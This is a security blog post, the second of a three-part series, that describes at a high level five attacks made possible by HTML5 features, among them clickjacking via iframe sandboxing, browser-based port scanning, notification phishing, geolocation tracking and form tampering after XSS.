This post is the second of a 3-part series of blog entries on HTML5. You can also check the first part: HTML – The Good.

Yesterday, we started the first of a three-part series investigating the new HTML5 standard. We started this by looking at some of the new features which are going to improve how we can interact with the Web.

In today’s post, we will look at how some of the features of HTML5 can be misused by attackers. This post is not meant to be an exhaustive list, but if you are interested in more details we will be releasing an in-depth paper on HTML5 Attacks tomorrow.

Below, in no particular order, are 5 new attacks made possible by features introduced in HTML5:

  1. Clickjacking made easy: Clickjacking itself is not a new attack. It is an attack that aims to effectively steal mouse button clicks from a victim and to redirect them to a different page the attacker specifies. The attacker’s goal is to make the user click on a concealed link without his knowledge.
    At the moment, one of the best server-side defenses against clickjacking is something calledFramekilling. Essentially, the affected site can use JavaScript to see if it is running in an iframe, and if so refuse to display. This technique is already in use by sites such as FacebookGmailand others.
    However, HTML5 adds a new “sandbox” attribute to iframes, which stops the site from running JavaScript. In many cases, this actually leads to a much more secure setup, but it does have the downside to nullifying the best current defense against clickjacking.
  2. Port Scanning using Cross Origin Requests or WebSockets: With HTML5, a browser can now connect to any IP address or site on (almost) any port. While it is not able to read the response of this connection unless this is specifically allowed by the target site, researchers have already shown that the amount of time the request takes can be used to determine if the target port is open or closed. This allows an attacker to carry out a port scan of a victim’s local network, directly from the browser.
  3. Social Engineering with Web Notifications: We mentioned web notifications in our post yesterday about the new features introduced by HTML5. These pop-ups which appear outside the browser can actually be fully customized using HTML code. While this allows for some very nice interaction possibilities, it is also a gold mine for social engineering attacks, such as phishing or FAKEAV. Check the picture below to get an idea of what attackers can do with this new feature.
  4. Tracking victims with Geolocation: Geolocation is one of the most talked about features introduced in HTML5. As a security and privacy concern, a site must always ask a user’s permission before being able to get access to this location information. However, as has been seen in the past with features such as Vista’s user access control, Android’s application permissions, and with invalid HTTPS certificates – security based on user needing to make a decision rarely works out well. Once permission is given, that site can not only learn the victim’s location, but also track that user in real-time as they move around.
  5. Form Tampering: Another new feature allows an attacker who has successfully injected JavaScript code into a site (e.g. from an XSS attack) to alter how the forms on that page behave. For example, an attacker can change a normally benign form on an online shop to instead submit content to the purchasing page, or a login page to instead send the user’s credentials to the attacker’s site.

Those are just 5 of the new attacks introduced by HTML5, and we covered them at a very high level. Here is the link that will lead you to final mini-blog series HTML5: The Ugly, and the release our paper on HTML5 Attacks.


2 thoughts on “HTML5 – The BAD

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s